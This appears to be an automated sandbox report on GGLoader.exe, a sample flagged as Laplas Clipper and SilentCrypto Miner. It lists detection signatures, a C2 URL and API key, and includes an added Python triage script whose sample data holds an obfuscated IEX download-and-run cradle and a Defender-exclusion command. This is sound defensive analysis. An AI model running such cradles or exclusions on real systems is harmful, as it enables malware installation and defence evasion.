Windows Analysis Report
GGLoader.exe

Overview

General Information

Sample name: GGLoader.exe
Analysis ID: 1526110
MD5: 982e4ae4559538cfb529dfaff0507880
SHA1: a3b0e3989d6e40792134286e40448004ebeda077
SHA256: 95a08f9fd8741d2b265a43143289af012ca24cee776609bc79337d63988246fd

Detection

Laplas Clipper, SilentCrypto Miner
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected Laplas Clipper
Yara detected Powershell download and execute
Yara detected SilentCrypto Miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Binary or sample is protected by dotNetProtector
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Drops large PE files
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found stalling execution ending in API Sleep call
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign process
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses cmd line tools excessively to alter registry or file data
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name differs from the original file name gathered from version info
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
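Several of the signatures above (Encrypted powershell cmdline option found, Powershell Base64 Encoded MpPreference Cmdlet, Net WebClient Casing Anomalies, Powershell download and execute, Adds a directory exclusion to Windows Defender) describe the same triage step: decode the base64 UTF-16LE payload behind -EncodedCommand and inspect it together with the raw command line. The script below is an added example of that step, written for this report; it is not code from Joe Sandbox or from the analysed sample. The sample command lines are constructed (the exclusion path reuses the Win32Sync drop directory named later in this report, the URL is a documentation address), and the casing-anomaly test is a simplified stand-in for the Sigma rule's logic.

```python
"""Triage helper for the PowerShell signatures in the list above: decodes
-EncodedCommand payloads and tags Defender-exclusion cmdlets, Net.WebClient
casing anomalies and IEX download cradles.  Added example, not part of the
Joe Sandbox report and not code from the analysed sample."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus the
# documented short form -ec.
_ENC_FLAGS = {"encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)} | {"ec"}

_MPPREF_RE = re.compile(r"(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)", re.I)
_WEBCLIENT_RE = re.compile(r"net\.webclient", re.I)
_NORMAL_WEBCLIENT = {"Net.WebClient", "net.webclient", "NET.WEBCLIENT"}
_IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
_DOWNLOAD_RE = re.compile(r"download(?:string|file|data)", re.I)


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script behind -EncodedCommand, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in ("-", "/") and tok[1:].lower() in _ENC_FLAGS:
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
                return None
    return None


def triage(cmdline: str) -> dict:
    """Classify one process command line; findings are stable tags in fixed order."""
    decoded = decode_encoded_command(cmdline)
    # Match against the raw line and the decoded script, so an exclusion
    # hidden inside base64 is still caught.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    findings = []
    if decoded is not None:
        findings.append("encoded_command")
    if _MPPREF_RE.search(text):
        findings.append("defender_exclusion")
    m = _WEBCLIENT_RE.search(text)
    if m and m.group(0) not in _NORMAL_WEBCLIENT:
        findings.append("webclient_casing_anomaly")
    if _IEX_RE.search(text) and _DOWNLOAD_RE.search(text):
        findings.append("download_cradle")
    return {"cmdline": cmdline, "decoded": decoded, "findings": findings}


def triage_all(cmdlines):
    return [triage(c) for c in cmdlines]


def _b64_utf16(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command lines modelled on the signature names; the exclusion
# path reuses the Win32Sync drop directory named in this report, the URL is a
# documentation address and not an indicator from the sample.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -enc "
    + _b64_utf16('Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming\\Win32Sync"'),
    "powershell.exe -ep bypass -c \"IEX (New-Object nEt.wEbClIeNt).DoWnLoAdStRiNg('http://203.0.113.5/a')\"",
    "powershell.exe -Command Get-Process",
]

if __name__ == "__main__":
    for r in triage_all(SAMPLE_CMDLINES):
        print(r["findings"], "<-", r["decoded"] or r["cmdline"][:70])
```

Feed it the CommandLine field of Sysmon event 1 or Security 4688 records; the decoded script, not just the raw line, is what should be written back to the case notes, since the exclusion directory it names is also the directory to sweep for dropped files.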

Classification

AV Detection

barindex
Source: GGLoader.exe Avira: detected
Source: C:\Program Files\Google\Chrome\updater.exe Avira: detection malicious, Label: HEUR/AGEN.1325648
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Avira: detection malicious, Label: HEUR/AGEN.1317771
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Avira: detection malicious, Label: HEUR/AGEN.1319806
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Avira: detection malicious, Label: HEUR/AGEN.1325648
Source: svcupdater.exe.7904.35.memstrmin Malware Configuration Extractor: Laplas Clipper {"C2 url": "http://45.159.189.105/bot/", "API key": "5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e"}
Source: C:\Program Files\Google\Chrome\updater.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\poduiwcd.tmp ReversingLabs: Detection: 75%
Source: GGLoader.exe ReversingLabs: Detection: 76%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Program Files\Google\Chrome\updater.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\LicenseGet.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\poduiwcd.tmp Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Joe Sandbox ML: detected
Source: GGLoader.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\dialer.exe Code function: 37_2_00007FF790DC1000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 37_2_00007FF790DC1000

Bitcoin Miner

barindex
Source: Yara match File source: 37.2.dialer.exe.7ff790dc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.powershell.exe.1c51e800000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.LicSend.exe.7ff7d3ba5900.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.dialer.exe.7ff790dc60b0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.powershell.exe.1c52eb9aeb0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.powershell.exe.42cce80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.powershell.exe.1c51e800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.LicSend.exe.7ff7d3ba5900.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.powershell.exe.1c52eb9aeb0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.dialer.exe.7ff790dc60b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.powershell.exe.42cce80.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.LicSend.exe.7ff7d3ba91b0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.LicSend.exe.7ff7d3ba91b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.LicSend.exe.7ff7d3b90000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000028.00000002.2555004791.000001C52EB9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2236987878.000001C51E800000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: LicSend.exe PID: 7948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 8068, type: MEMORYSTR
Source: GGLoader.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: GGLoader.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbQZmW source: powershell.exe, 00000001.00000002.1955811622.000001EC48C05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\Mining\Miner\SilentCryptoMiner\r77-rootkit-master\Stager\obj\x64\Release\Stager.pdb source: LicSend.exe, 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ore.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbD source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1965111928.000001EC48EB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000026.00000002.2213441971.0000000002851000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: t.Automation.pdb_ source: powershell.exe, 00000001.00000002.1951237178.000001EC48B7C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb23~W4 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb:3FW3 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000028.00000002.2583801472.000001C536CC8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\dialer.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00C0A1F1 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 35_2_00C0A1F1
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E59BE3C FindFirstFileExW, 39_2_000002505E59BE3C
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1BBE3C FindFirstFileExW, 41_2_000001C08C1BBE3C
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_000002131118BE3C FindFirstFileExW, 42_2_000002131118BE3C
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC64BE3C FindFirstFileExW, 43_2_00000225DC64BE3C
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Code function: 4x nop then push rbx 7_2_00007FF7D3B99F43

Networking

Source: Network traffic Suricata IDS: 2039775 - Severity 1 - ET MALWARE Laplas Clipper - Regex CnC Request : 192.168.2.4:49739 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2039776 - Severity 1 - ET MALWARE Laplas Clipper - SetOnline CnC Checkin : 192.168.2.4:49740 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2039775 - Severity 1 - ET MALWARE Laplas Clipper - Regex CnC Request : 192.168.2.4:50007 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2039776 - Severity 1 - ET MALWARE Laplas Clipper - SetOnline CnC Checkin : 192.168.2.4:50008 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.4:49730 -> 185.166.143.49:443
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B7B000.00000004.00000800.00020000.00000000.sdmp String found in memory: Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmp String found in memory: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com 